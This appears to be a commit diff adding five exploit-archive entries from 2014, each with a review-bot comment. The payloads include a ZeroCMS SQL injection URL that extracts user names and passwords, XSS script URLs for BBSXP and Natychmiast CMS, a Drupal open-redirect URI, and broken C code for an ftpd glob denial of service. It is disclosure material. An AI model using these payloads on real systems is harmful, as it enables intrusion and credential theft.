Updated 06_12_2014
parent 9317b28542
commit 5386cedc8f
6 changed files with 137 additions and 0 deletions
|
@ -30357,3 +30357,8 @@ id,file,description,date,author,platform,type,port
|
|||
33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 (surname param) - Persistent XSS Vulnerability",2014-06-09,"shyamkumar somana",php,webapps,80
|
||||
33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80
|
||||
33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 to 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80
|
||||
33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php, article_id param) - SQL Injection Vulnerability",2014-06-10,LiquidWorm,php,webapps,80
|
||||
33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 'ShowPost.asp' Cross-Site Scripting Vulnerability",2010-03-04,Liscker,asp,webapps,0
|
||||
33706,platforms/php/webapps/33706.txt,"Drupal Prior to 6.16 and 5.22 Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0
|
||||
33708,platforms/bsd/dos/33708.c,"FreeBSD <= 8.0 and OpenBSD 4.x 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability",2010-03-05,kingcope,bsd,dos,0
|
||||
33709,platforms/php/webapps/33709.txt,"Natychmiast CMS Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2010-03-05,"Maciej Gojny",php,webapps,0
|
||||
|
|
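Review bot: The port column is inconsistent across the added rows: 33702 records port 80 like the surrounding webapps entries, while 33704, 33706 and 33709 are also webapps but carry port 0, as does the ftpd entry 33708. If 0 is meant as "not recorded", say so in the column documentation; otherwise fill in the service port so that filtering by port does not silently drop these rows.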
|
24
platforms/asp/webapps/33704.txt
Executable file
|
@ -0,0 +1,24 @@
|
|||
source: http://www.securityfocus.com/bid/38542/info
|
||||
|
||||
BBSXP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
BBSXP 2008 is vulnerable; other versions may also be affected.
|
||||
|
||||
Home Page : http://www.bbsxp.com/
|
||||
|
||||
|
||||
i found a xss on "ThreadID" parameter in "ShowPost.asp" in BBSXP 2008 , it's "ShowPost.asp?ThreadID="
|
||||
|
||||
for example:
|
||||
http://www.example.com/ShowPost.asp?ThreadID=1"><script>alert(/Liscker/);</script>
|
||||
|
||||
We shouldnt encode the script, or, the xss will fail.
|
||||
|
||||
|
||||
|
||||
|
||||
Liscker
|
||||
|
||||
2010.3.4
|
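Review bot: The write-up never states where ThreadID is reflected in the ShowPost.asp response or how to fix it; the only hint is the `">` prefix in the example URI, which suggests the value lands inside a quoted HTML attribute. A sentence naming the output context, plus the remediation (accept ThreadID only as an integer and HTML-encode it on output), would make the entry usable for triage. The file is also listed as "Executable file" although it is a plain .txt note; the executable bit should be dropped.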
47
platforms/bsd/dos/33708.c
Executable file
|
@ -0,0 +1,47 @@
|
|||
source: http://www.securityfocus.com/bid/38559/info
|
||||
|
||||
The FreeBSD and OpenBSD 'ftpd' service is prone to a denial-of-service vulnerability because of a NULL-pointer dereference.
|
||||
|
||||
Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
|
||||
|
||||
This issue affects the following releases:
|
||||
|
||||
FreeBSD 8.0, 6.3, 4.9
|
||||
OpenBSD 4.5 and 4.6
|
||||
|
||||
#include <glob.h>
|
||||
#include <stdio.h>
|
||||
|
||||
#define MAXUSRARGS 100
|
||||
#define MAXGLOBARGS 1000
|
||||
|
||||
void do_glob() {
|
||||
glob_t gl;
|
||||
char **pop;
|
||||
|
||||
char buffer[256];
|
||||
strcpy(buffer, "{A*/../A*/../A*/../A*/../A*/../A*/../A*}");
|
||||
|
||||
int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
|
||||
memset(&gl, 0, sizeof(gl));
|
||||
gl.gl_matchc = MAXGLOBARGS;
|
||||
flags |= GLOB_LIMIT;
|
||||
if (glob(buffer, flags, NULL, &gl)) {
|
||||
printf("GLOB FAILED!\n");
|
||||
return 0;
|
||||
}
|
||||
else
|
||||
// for (pop = gl.gl_pathv; pop && *pop && 1 <
|
||||
(MAXGLOBARGS-1);
|
||||
for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1);
|
||||
pop++) {
|
||||
printf("glob success");
|
||||
return 0;
|
||||
}
|
||||
globfree(&gl);
|
||||
}
|
||||
|
||||
main(int argc, char **argv) {
|
||||
do_glob();
|
||||
do_glob();
|
||||
}
|
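Review bot: The advisory text at the top of 33708.c (from "source:" down to "OpenBSD 4.5 and 4.6") is not inside a comment, so the file cannot compile as committed; wrap that header in /* ... */. Further down, strcpy and memset are used without including <string.h>, do_glob is declared void yet executes "return 0;", and main has no return type. The `//` comment before the loop covers only its first line, so the continuation "(MAXGLOBARGS-1);" becomes the body of the else and the for loop runs unconditionally. The loop condition "1 < (MAXGLOBARGS-1)" is constant, and the return inside the loop skips globfree(&gl). A short comment stating which of these are intentional for the NULL-dereference demonstration would help whoever maintains this file.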
36
platforms/php/webapps/33702.txt
Executable file
|
@ -0,0 +1,36 @@
|
|||
?
|
||||
ZeroCMS 1.0 (article_id) SQL Injection Vulnerability
|
||||
|
||||
|
||||
Vendor: Another Awesome Stuff
|
||||
Product web page: http://www.aas9.in/zerocms/
|
||||
Affected version: 1.0
|
||||
|
||||
Summary: ZeroCMS is a very simple Content Management
|
||||
System built using PHP and MySQL.
|
||||
|
||||
Desc: Input passed via the 'article_id' GET parameter
|
||||
to zero_view_article.php script is not properly sanitised
|
||||
before being used in SQL queries. This can be exploited
|
||||
to manipulate SQL queries by injecting arbitrary SQL code.
|
||||
|
||||
Tested on: Apache/2.4.7 (Win32)
|
||||
PHP/5.5.6
|
||||
MySQL 5.6.14
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2014-5186
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5186.php
|
||||
|
||||
|
||||
09.06.2014
|
||||
|
||||
--
|
||||
|
||||
|
||||
http://localhost/zerocms/zero_view_article.php?article_id=1337+union+all+select+concat(unhex(hex(cast(database()+as+char)))),2,3,4,5,6--
|
||||
http://localhost/zerocms/zero_view_article.php?article_id=1337+union+all+select+(select+concat(unhex(hex(cast(zero_users.name+as+char))),0x20,0x7c,0x20,unhex(hex(cast(zero_users.password+as+char))))+from+`zcdb`.zero_users+limit 0,1),2,3,4,5,6--
|
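Review bot: The first added line of 33702.txt is a lone "?", which looks like a byte that was mis-decoded on import rather than advisory content; strip it or re-import the file with the correct encoding. The second example URL also contains a literal space in "limit 0,1" where the rest of the query uses "+", so it is not a well-formed URL as written. The Desc paragraph says article_id is "not properly sanitised" but gives no remediation; a line noting that the parameter should be handled as an integer and bound through a parameterised query would complete the entry.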
15
platforms/php/webapps/33706.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/38545/info
|
||||
|
||||
Drupal is prone to multiple vulnerabilities, including cross-site scripting issues, a phishing issue, and a security-bypass issue.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, bypass security restrictions, or perform other attacks.
|
||||
|
||||
These issues affect the following:
|
||||
|
||||
Drupal 5.x prior to 5.22
|
||||
Drupal 6.x prior to 6.16
|
||||
|
||||
The following example URI is available for the redirect issue:
|
||||
|
||||
http://www.example.com/drupal-6.16/index.php?q=http://www.example.net
|
||||
|
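Review bot: The example URI uses the path "drupal-6.16", but the affected-versions list above it says Drupal 6.x prior to 6.16, so the example points at the release the text describes as fixed. Either change the path to a version inside the affected range or add a line explaining why 6.16 appears. The summary also lists "a phishing issue" while the example is introduced as "the redirect issue"; use one term so readers can tell they are the same finding.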
10
platforms/php/webapps/33709.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/38561/info
|
||||
|
||||
Natychmiast CMS is prone to multiple cross-site scripting and SQL-injection vulnerabilities.
|
||||
|
||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?id_str=[SQLi]
|
||||
http://www.example.com/a_index.php?id_str=[SQLi]
|
||||
http://www.example.com/index.php?id_str='%22%3E%3Cscript%3Ealert(0x000024)%3C/script%3E
|
||||
http://www.example.com/a_index.php?id_str='%22%3E%3Cscript%3Ealert(0x000024)%3C/script%3E
|
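Review bot: The description never names the affected parameter, although all four URIs show id_str in index.php and a_index.php as the input for both the SQL injection and the cross-site scripting cases. State that explicitly in the text, and replace the bare "[SQLi]" placeholder with a sentence on what is known about the injection point (for example whether id_str is expected to be numeric), so that the entry can be matched against the application without guessing. No affected version is given either; add it or note that it is unknown.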